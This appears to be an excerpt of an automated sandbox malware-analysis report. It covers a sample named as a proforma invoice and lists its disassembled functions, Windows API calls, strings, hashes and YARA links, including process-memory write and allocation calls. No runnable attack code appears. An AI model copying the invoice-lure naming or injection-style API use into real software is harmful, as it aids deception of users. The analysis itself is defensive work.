                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
                                                                                                                    • Instruction ID: 82da4e70b03bff818979eb0da8363a8c10bf2bb76335e7333e612a962a1129d5
                                                                                                                    • Opcode Fuzzy Hash: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
                                                                                                                    • Instruction Fuzzy Hash: 35A16AB1114205AFD300EF64C881EABB7ECEF85355F00492CF9569B1A2EB70EA59CF56
                                                                                                                    Function 00262CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 00257A51: _memmove.LIBCMT ref: 00257AAB
                                                                                                                    • __swprintf.LIBCMT ref: 00262ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00262D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: aaaa1f93e085f2bb1ac5efdadcd28dc49036ff971deb478553ae638d32247b1b
                                                                                                                    • Instruction ID: 0c3ab05f44d4a92014937a6941bff325cc31025f8f337d8f47100a74dbbde61c
                                                                                                                    • Opcode Fuzzy Hash: aaaa1f93e085f2bb1ac5efdadcd28dc49036ff971deb478553ae638d32247b1b
                                                                                                                    • Instruction Fuzzy Hash: 83918E71128612DFCB14EF24D895C6FB7E8EF85714F00491DF8459B2A1EA30EDA8CB56
                                                                                                                    Function 002BB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002BB9BB
                                                                                                                    • CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BB9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 002BB9F1
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
                                                                                                                    • Instruction ID: b291905d63fc731f42183037c7dbefc620d0dfac4ccf3192aaa83024392534ce
                                                                                                                    • Opcode Fuzzy Hash: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
                                                                                                                    • Instruction Fuzzy Hash: 0FA144756242019FCB00DF14C884D6ABBE5FF89314F148998F89A9B3A2CB71EC59CF91
                                                                                                                    Function 002AB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 002AB4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%.
                                                                                                                    • API String ID: 3565006973-783795609
                                                                                                                    • Opcode ID: 6439c9c32b4365d73e252201733d5acfd734cd8f383eda19b9d87d880722aa97
                                                                                                                    • Instruction ID: 6bf93f6ef345e21caae683837633921a875c13c289982c2425765ef9b4245cae
                                                                                                                    • Opcode Fuzzy Hash: 6439c9c32b4365d73e252201733d5acfd734cd8f383eda19b9d87d880722aa97
                                                                                                                    • Instruction Fuzzy Hash: 4B916A70610601EFDB15CF64C894B6ABBE9FF4A700F24856DF90ACB292DBB1E851CB50
                                                                                                                    Function 0027501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 002750AD
                                                                                                                      • Part of subcall function 002800F0: __87except.LIBCMT ref: 0028012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
                                                                                                                    • Instruction ID: 6e59fe2f1a44f9b9c01f8cf512fff44631eef889f14959ae0a53b85a39318afb
                                                                                                                    • Opcode Fuzzy Hash: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
                                                                                                                    • Instruction Fuzzy Hash: 8B517C2493A50386DB517F28C88936EAB949B01710F30CD59E4DD862E9DFF48DFC9B86
                                                                                                                    Function 00298584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c&$_&
                                                                                                                    • API String ID: 4104443479-1388094336
                                                                                                                    • Opcode ID: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
                                                                                                                    • Instruction ID: c6c7032c2aeb7f6a78cf79d3d31691c7b6fdd427fe4c26a709d4ba3060191969
                                                                                                                    • Opcode Fuzzy Hash: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
                                                                                                                    • Instruction Fuzzy Hash: 93519D7091061A9FCF20CF68C884AAEBBF1FF45304F258529E85AD7250EB31A9A5CF51
                                                                                                                    Function 002A97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9296,?,?,00000034,00000800,?,00000034), ref: 002B14E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002A983F
                                                                                                                      • Part of subcall function 002B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 002B14B1
                                                                                                                      • Part of subcall function 002B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 002B1409
                                                                                                                      • Part of subcall function 002B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B1419
                                                                                                                      • Part of subcall function 002B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
                                                                                                                    • Instruction ID: e5714892f4e3dfcc1ba98fcb9ce83606770cd2f5423879b080cb25ffd3adb223
                                                                                                                    • Opcode Fuzzy Hash: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
                                                                                                                    • Instruction Fuzzy Hash: 13415B76901219BFCB10DFA4CD95ADEBBB8EF0A340F004099FA55B7181DA706E95CFA0
                                                                                                                    Function 002D7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DF910,00000000,?,?,?,?), ref: 002D79DF
                                                                                                                    • GetWindowLongW.USER32 ref: 002D79FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D7A0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
                                                                                                                    • Instruction ID: 35ff9d68b6218f08139951bf39370542d86f133d4a01432e21aa290e9308b1b5
                                                                                                                    • Opcode Fuzzy Hash: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
                                                                                                                    • Instruction Fuzzy Hash: D731E132224606AFDB118F38DC45BEA77A9EB09334F244726F875932E0E734ED608B50
                                                                                                                    Function 002D73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D7461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D7475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
                                                                                                                    • Instruction ID: 0f418cf33f186ca33251248aa0fc4eb72d2c6e6974394d7f30f676e0774af34c
                                                                                                                    • Opcode Fuzzy Hash: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
                                                                                                                    • Instruction Fuzzy Hash: F421A132510219AFDF128F64DC46FEA3B79EF48724F110215FE156B2D0EAB5AC61DBA0
                                                                                                                    Function 002D7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002D7C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002D7C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002D7C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: 4182720bb26a99d64920b9e40b3bf0e2428edba88d5e6bf63f1d59a3d9449998
                                                                                                                    • Instruction ID: d4d584cedcf39eed98c005754cbcef321f082f9cdec349e0858a47ccbf9c2388
                                                                                                                    • Opcode Fuzzy Hash: 4182720bb26a99d64920b9e40b3bf0e2428edba88d5e6bf63f1d59a3d9449998
                                                                                                                    • Instruction Fuzzy Hash: 00215EB5624209AFDB11DF28DCC1DA637ECEF4A364B14405AF9159B3A1DB71EC218BA0
                                                                                                                    Function 002D6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D6D3B
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D6D4B
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D6D70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: 93f71d55e120beae216f71375e3de365952d7ba7e79358d39c03a76c50e69a62
                                                                                                                    • Instruction ID: c9168f7f7c962dbd8385a7b6c876fda5e9e0e7946bf6daeadd1a1868ad0bb99e
                                                                                                                    • Opcode Fuzzy Hash: 93f71d55e120beae216f71375e3de365952d7ba7e79358d39c03a76c50e69a62
                                                                                                                    • Instruction Fuzzy Hash: 6D21D432621119BFDF128F54DC49FFB3BBAEF89750F018126F9459B2A0C6719C618BA0
                                                                                                                    Function 002C39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __snwprintf.LIBCMT ref: 002C3A66
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%.
                                                                                                                    • API String ID: 3506404897-205648231
                                                                                                                    • Opcode ID: 7893c0aff90e01a5b57c8747887ba5d496b6705264993beef8166f21b99ad066
                                                                                                                    • Instruction ID: ac1703969b7c370dbb7c38a49532286acafb2ff38e1d59132c0babccbaa25257
                                                                                                                    • Opcode Fuzzy Hash: 7893c0aff90e01a5b57c8747887ba5d496b6705264993beef8166f21b99ad066
                                                                                                                    • Instruction Fuzzy Hash: 8D219131620219AFCF15EF64CC92EAE77B5AF44301F004859F845AB281DB70EA75CF65
                                                                                                                    Function 002D770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D7772
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D7787
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 66a682e363ea50406f92c93e65753c3fdc9569a0815a4bf83b02fe0a5014a88c
                                                                                                                    • Instruction ID: a97475bb5f2f148f2374ee3fc245b0ee4320b151e1c110ea97af50182de787e8
                                                                                                                    • Opcode Fuzzy Hash: 66a682e363ea50406f92c93e65753c3fdc9569a0815a4bf83b02fe0a5014a88c
                                                                                                                    • Instruction Fuzzy Hash: 5211E772264209BEEF105F65CC05FDB776DEF88B54F114519FA45961D0D671EC21CB10
                                                                                                                    Function 00276B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __calloc_crt
                                                                                                                    • String ID: 0$@B1
                                                                                                                    • API String ID: 3494438863-589020848
                                                                                                                    • Opcode ID: e1a3a2beaa8f6e3f8eb62e529571c7c4798da7040df3b01bfcf5d60c0fe6f6ee
                                                                                                                    • Instruction ID: fcafaea752801727749b0f19c8a29996633edb95074408ba167a920ffaebc435
                                                                                                                    • Opcode Fuzzy Hash: e1a3a2beaa8f6e3f8eb62e529571c7c4798da7040df3b01bfcf5d60c0fe6f6ee
                                                                                                                    • Instruction Fuzzy Hash: 70F0C876325E12CBF7298F55BC55B926799E785334F50C81AE108EE1C0EB74885246D0
                                                                                                                    Function 00279B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 00279B94
                                                                                                                      • Part of subcall function 00279C0B: __mtinitlocknum.LIBCMT ref: 00279C1D
                                                                                                                      • Part of subcall function 00279C0B: EnterCriticalSection.KERNEL32(00000000,?,00279A7C,0000000D), ref: 00279C36
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00279BA4
                                                                                                                      • Part of subcall function 00279100: ___addlocaleref.LIBCMT ref: 0027911C
                                                                                                                      • Part of subcall function 00279100: ___removelocaleref.LIBCMT ref: 00279127
                                                                                                                      • Part of subcall function 00279100: ___freetlocinfo.LIBCMT ref: 0027913B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
